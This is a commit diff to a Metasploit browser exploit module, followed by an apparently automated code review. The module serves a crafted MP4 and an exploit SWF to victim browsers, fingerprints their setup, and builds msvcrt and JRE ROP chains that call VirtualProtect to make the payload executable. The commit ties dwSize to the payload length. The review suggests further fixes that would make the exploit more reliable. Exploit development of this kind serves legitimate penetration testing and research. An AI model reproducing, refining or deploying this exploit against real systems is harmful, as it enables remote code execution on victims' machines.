Dynamic VirtualProtect dwSize. Change output style.
This commit is contained in:
parent
de888e50f0
commit
25a1552fbd
|
@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
|
||||
exec_size = code.length
|
||||
rop =
|
||||
[
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
|
@ -146,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77c4ec00, # POP EBP # RETN
|
||||
0x77c35459, # ptr to 'push esp # ret'
|
||||
0x77c47705, # POP EBX # RETN
|
||||
0x00000800, # <- change size to mark as executable if needed (-> ebx)
|
||||
exec_size, # EBX
|
||||
0x77c3ea01, # POP ECX # RETN
|
||||
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
|
||||
0x77c46100, # POP EDI # RETN
|
||||
|
@ -154,16 +155,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77c4d680, # POP EDX # RETN
|
||||
0x00000040, # newProtect (0x40) (-> edx)
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
nop, # NOPS (-> eax)
|
||||
nop, # NOPS (-> eax)
|
||||
0x77c12df9, # PUSHAD # RETN
|
||||
].pack("V*")
|
||||
|
||||
when :jre
|
||||
print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
|
||||
exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
|
||||
rop =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
|
||||
exec_size, # Value to negate, will become 0x00000201 (dwSize)
|
||||
0x7c347f98, # RETN (ROP NOP)
|
||||
0x7c3415a2, # JMP [EAX]
|
||||
0xffffffff,
|
||||
|
@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
|
||||
mp4 = create_mp4(my_target)
|
||||
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
|
||||
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||
return
|
||||
end
|
||||
|
@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
|||
end
|
||||
|
||||
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
||||
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
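Review bot: The new JRE-side size line `exec_size = [0-code.length].pack('V').unpack('L')[0].to_i` packs little-endian (`'V'`) and then unpacks native-endian (`'L'`), so the two's-complement value is only correct on a little-endian host, and the trailing `.to_i` is a no-op on the Integer `unpack` already returns; `exec_size = (-code.length) & 0xffffffff` states the intent without the endianness mismatch. The comment kept on the new `exec_size, # Value to negate, will become 0x00000201 (dwSize)` line still describes the old fixed size and should read something like `# -code.length; the chain negates it into dwSize` (the comment on the gadget above says the value is negated, though the negating gadget itself is outside these hunks). On the msvcrt side, replacing the 0x800 constant with `code.length` as EBX/dwSize appears sound because VirtualProtect rounds the range to page boundaries, but since the old value looked like a deliberate margin a one-line comment such as `# exact payload length; VirtualProtect rounds up to page granularity` would save the next reader from re-deriving that. The `case t['Rop']` and its enclosing method begin and end outside the visible hunks.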
|